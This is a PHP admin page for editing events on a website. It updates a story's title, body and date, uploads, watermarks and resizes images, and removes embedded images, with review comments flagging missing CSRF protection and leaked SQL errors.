//var/www/ridazz/admin/eventEdit.php
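<?php
/**
 * Admin page: edit an existing event/story (title, body, date) and manage the
 * images embedded in it.
 *
 * Request parameters read here: storyId, action=removeImage + embedId,
 * update + title/body/year/month/day, and the upload fields file1..file10.
 *
 * Helpers such as has_permission(), isNum(), sanitize_*(), validate_content(),
 * get_unique_filename(), get_table(), the gd_img class and $db come from the
 * included project files; their exact behaviour is not visible from this file.
 *
 * NOTE(review): both state-changing paths (removeImage, reachable through a
 * plain GET link, and the update POST) carry no anti-CSRF token. They should
 * require POST plus a per-session token that is verified before any write.
 * NOTE(review): SQL error text is sent to the browser via die(); prefer
 * logging it server-side and showing a generic message.
 */
include_once('../includes/static/configure.php');
include_once('../includes/static/util.php');
include_once('../includes/static/dbcon2.php');
include_once('../includes/static/gdimg.php');
include_once('../includes/static/sessions.php');
include_once('includes/static/util.php');
include_once('includes/appTop2.php');

// Derive the permission key from this file's own name. PHP_SELF can carry a
// client-supplied PATH_INFO suffix, which would let the request choose the key.
$page_id = str_replace(".php","",basename(__FILE__));
if(!has_permission($page_id)){
    die("You don't have permission to view this page!");
}

// PHP_SELF is echoed into HTML attributes below, so it is escaped once here.
$self_url = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES);

$html = "";

$uid = 0;
if(isset($_SESSION['admin_id'])){
    $uid = isNum($_SESSION['admin_id'], 0);
}elseif(isset($_SESSION['editor_id'])){
    $uid = isNum($_SESSION['editor_id'], 0);
}

$story_id = 0;
if(isset($_REQUEST['storyId'])){
    $story_id = isNum($_REQUEST['storyId'], 0);
}

$action = "";
if(isset($_REQUEST['action'])){
    $action = $_REQUEST['action'];
}

if($action == "removeImage" && isset($_REQUEST['embedId'])){
    // NOTE(review): the delete is keyed on embed_id alone and is not tied to
    // $story_id; confirm that page-level permission is the intended scope.
    $embedId = $db->sanitize_input($_REQUEST['embedId']);
    $sql = "DELETE FROM 50mm_embed WHERE embed_id ='".$embedId."'";
    if( !($result = $db->sql_query($sql)) ){
        $sql_error = $db->sql_error();
        die($sql_error['message']);
    }
}

if(isset($_REQUEST['update'])){
    //store text
    $story_title = $db->sanitize_input(sanitize_title($_REQUEST['title']));
    $story_body  = $db->sanitize_input(sanitize_body($_REQUEST['body']));
    // The date is passed through the same DB escaping as the other fields
    // instead of relying on sanitize_date() alone.
    $date = $db->sanitize_input(sanitize_date($_REQUEST['year']."-".$_REQUEST['month']."-".$_REQUEST['day']));
    $sql = "UPDATE 50mm_stories SET story_title='$story_title',story_body='$story_body',entry_time='$date' WHERE story_id='$story_id'";
    if( !($result = $db->sql_query($sql)) ){
        $sql_error = $db->sql_error();
        die($sql_error['message']);
    }

    //store images
    // Extensions accepted for files written into the web-served image
    // directories. TODO confirm against the formats gd_img can actually write.
    $allowed_ext = array('jpg','jpeg','png','gif');
    for($i=1;$i<=count($_FILES);$i++){
        $field = 'file'.$i;
        if(!isset($_FILES[$field])){
            continue;
        }
        $cur_file  = $_FILES[$field]['name'];
        $cur_temp  = $_FILES[$field]['tmp_name'];
        $cur_size  = $_FILES[$field]['size'];
        $cur_mime  = $_FILES[$field]['type'];   // client-supplied, not trusted below
        $cur_error = $_FILES[$field]['error'];
        if(empty($cur_file)){
            continue;
        }
        $shown_name = htmlspecialchars($cur_file, ENT_QUOTES);

        $valid = validate_content($cur_error,$cur_mime,$cur_size,$cur_file,EVENT_MAX_KB);
        if(!$valid['result']){
            $html .= "<div class=\"error\">Unable to store the following content $shown_name<br> Reason: ".htmlspecialchars($valid['error'], ENT_QUOTES)."</div>";
            continue;
        }

        // Only process a genuine HTTP upload that parses as an image; the
        // type is taken from the file contents, not from the request.
        $image_info = is_uploaded_file($cur_temp) ? getimagesize($cur_temp) : false;
        if($image_info === false){
            $html .= "<div class=\"error\">Unable to store the following content $shown_name<br> Reason: not a readable image</div>";
            continue;
        }

        // basename() keeps the stored name inside the target directories.
        $unique_name = $db->sanitize_input(basename(get_unique_filename($cur_file)));
        $ext = strtolower(pathinfo($unique_name, PATHINFO_EXTENSION));
        if(!in_array($ext, $allowed_ext, true)){
            $html .= "<div class=\"error\">Unable to store the following content $shown_name<br> Reason: file extension not allowed</div>";
            continue;
        }

        //create image resource
        $gd = new gd_img($image_info['mime'],$cur_temp);
        if(!$gd->img_id){ die($gd->gd_error); }

        //check to see if thumb image needs resizing
        if(($image_info[0] > EVENT_THUMB_WIDTH) || ($image_info[1] > EVENT_THUMB_HEIGHT)){
            //resize
            // NOTE(review): the width constant is passed for both dimensions;
            // confirm whether EVENT_THUMB_HEIGHT was intended for the second.
            $id_t = $gd->gd_scale_img(EVENT_THUMB_WIDTH,EVENT_THUMB_WIDTH,IMG_QUALITY);
            if(!$id_t){ die($gd->gd_error); }
            $res = $gd->gd_create_img($id_t,ROOT_DIR.STORY_SIMG_DIR.$unique_name);
            if(!$res){ die($gd->gd_error); }
        }else{
            //don't resize
            $res = $gd->gd_create_img($gd->img_id,ROOT_DIR.STORY_SIMG_DIR.$unique_name);
            if(!$res){ die($gd->gd_error); }
        }

        //create watermark image
        $w_type = getimagesize(WATERMARK_FILE);
        $gdw = new gd_img($w_type['mime'],WATERMARK_FILE);
        if(!$gdw->img_id){ die($gdw->gd_error); }

        //check to see if full size image needs resizing
        if(($image_info[0] > EVENT_IMG_WIDTH) || ($image_info[1] > EVENT_IMG_HEIGHT)){
            //scale image
            // NOTE(review): width constant used for both dimensions here too.
            $id = $gd->gd_scale_img(EVENT_IMG_WIDTH,EVENT_IMG_WIDTH,IMG_QUALITY);
            if(!$id){ die($gd->gd_error); }
            //apply watermark
            $res = $gd->gd_merge_ids($id,$gdw->img_id);
            if(!$res){ die($gd->gd_error); }
            //create scaled image
            $res = $gd->gd_create_img($id,ROOT_DIR.STORY_LIMG_DIR.$unique_name);
            if(!$res){ die($gd->gd_error); }
        }else{
            $id = $gd->img_id;
            //apply watermark
            $res = $gd->gd_merge_ids($id,$gdw->img_id);
            if(!$res){ die($gd->gd_error); }
            //create full image
            $res = $gd->gd_create_img($gd->img_id,ROOT_DIR.STORY_LIMG_DIR.$unique_name);
            if(!$res){ die($gd->gd_error); }
        }

        $sql = "INSERT INTO 50mm_embed (story_id,image) VALUES ('$story_id','$unique_name')";
        if( !($result = $db->sql_query($sql)) ){
            $sql_error = $db->sql_error();
            die($sql_error['message']);
        }
    }
    $html .= "<div class=\"hilite\">operation successful</div>";
}

include_once('includes/header.php');

//get event info
// $html is deliberately NOT reset here: it holds the status and error
// messages collected above, which are printed just before the form.
$sql = "SELECT story_id, story_title, story_body, entry_time FROM 50mm_stories WHERE story_id = '$story_id' ORDER BY story_id DESC";
if( !($result = $db->sql_query($sql)) ){
    $sql_error = $db->sql_error();
    die($sql_error['message']);
}
$row = $db->sql_fetchrow($result);
if(!$row){
    // Unknown story: show a message and an empty form instead of indexing a
    // non-array result.
    $row = array('story_id'=>0,'story_title'=>'','story_body'=>'','entry_time'=>'');
    $html .= "<div class=\"error\">Event not found</div>";
}
$story_id    = $row['story_id'];
$story_title = $row['story_title'];
$story_body  = $row['story_body'];
$day   = substr($row['entry_time'],8,2);
$month = substr($row['entry_time'],5,2);
$year  = substr($row['entry_time'],0,4);

$sql = "SELECT image,embed_id FROM 50mm_embed WHERE story_id = '$story_id'";
if( !($result = $db->sql_query($sql)) ){
    $sql_error = $db->sql_error();
    die($sql_error['message']);
}

$modrows = array();
while ($row = $db->sql_fetchrow($result)){
    $embed_id = $row['embed_id'];
    $img_path = ROOT_DIR.STORY_LIMG_DIR.$row['image'];
    $img_info = is_file($img_path) ? getimagesize($img_path) : false;
    if($img_info !== false){
        // Scale the longer side down to roughly 50px. Clamp the divisor to 1
        // so images under 25px on both sides do not divide by zero.
        $scale = max(1, round(max($img_info[0], $img_info[1])/50));
        $w = $img_info[0]/$scale;
        $h = $img_info[1]/$scale;
        $js = "popImage('".urlencode(STORY_LIMG_DIR.$row['image'])."','".$img_info[0]."','".$img_info[1]."');";
        $row['image'] = "<img src=\"".htmlspecialchars(STORY_SIMG_DIR.$row['image'], ENT_QUOTES)."\" border=\"0\" width=\"$w\" height=\"$h\" style=\"cursor:pointer;\" onClick=\"".$js."\">";
    }else{
        $row['image'] = "no image on disk";
    }
    $xtras = array(
        "remove"=>"<a href=\"".$self_url."?storyId=".urlencode($story_id)."&amp;embedId=".urlencode($embed_id)."&amp;action=removeImage\">remove</a>"
    );
    unset($row['embed_id']);
    $all = array_merge($row,$xtras);
    array_push($modrows, $all);
}
echo(get_table($modrows));
?>
<?php echo $html; ?>
<script>divs = new Array('title','body');</script>
<form action="<?php echo $self_url; ?>" method="post" enctype="multipart/form-data" onSubmit="return validateForm(this,divs,'eventError');">
<table cellspacing="0" cellpadding="4" border="0">
    <tr>
        <td>Title<span id="errtitle" class="error" style="visibility:hidden;"> *</span></td>
        <td><input type="text" name="title" value="<?php echo htmlspecialchars($story_title, ENT_QUOTES); ?>" class="field" style="width: 200px;"></td>
    </tr>
    <tr>
        <td>Date</td>
        <td>
        <?php
        // foreach replaces each(), which was removed in PHP 8.
        $m_opt = '<select name="month">'."\n";
        foreach ($month_array as $key => $txt) {
            $sel = ($key == $month) ? ' selected' : '';
            $m_opt .= '<option value="'.$key.'"'.$sel.'>'.$txt.'</option>'."\n";
        }
        $m_opt .= '</select>'."\n";
        echo $m_opt;
        ?>
        -
        <?php
        $d_opt = '<select name="day">'."\n";
        for($i=1;$i<=31;$i++){
            $key = sprintf('%02d', $i);
            $sel = ($key == $day) ? ' selected' : '';
            $d_opt .= '<option value="'.$key.'"'.$sel.'>'.$i.'</option>'."\n";
        }
        $d_opt .= '</select>'."\n";
        echo $d_opt;
        ?>
        -
        <?php
        $start_year = date('Y') - 2;
        $end_year   = date('Y') + 2;
        $y_opt = '<select name="year">'."\n";
        for($i=$start_year;$i<=$end_year;$i++){
            $sel = ($i == $year) ? ' selected' : '';
            $y_opt .= '<option value="'.$i.'"'.$sel.'>'.$i.'</option>'."\n";
        }
        $y_opt .= '</select>'."\n";
        echo $y_opt;
        ?>
        </td>
    </tr>
    <tr>
        <td>Upload Image(s)</td>
        <td>
        <?php
        for($i=1;$i<=10;$i++){
            echo "<input type=\"file\" name=\"file".$i."\" class=\"field\"><br>";
        }
        ?>
        </td>
    </tr>
    <tr>
        <td>Body<span id="errbody" class="error" style="visibility:hidden;"> *</span></td>
        <td><textarea wrap="on" name="body" class="body" style="width: 2000px; height: 200px;"><?php echo htmlspecialchars($story_body, ENT_QUOTES); ?></textarea></td>
    </tr>
    <tr>
        <td colspan="2" align="center">
            <div align="left">
                <input name="update" type="submit" class="button" value="Update Event">
                <input name="storyId" type="hidden" value="<?php echo htmlspecialchars($story_id, ENT_QUOTES); ?>"></div>
            <div id="eventError" class="error" style="visibility:hidden;">Please correct the fields marked by *</div>
        </td>
    </tr>
</table>
</form>
<br>
<?php
include_once('includes/footer.php');
include_once('includes/appBottom.php');
?>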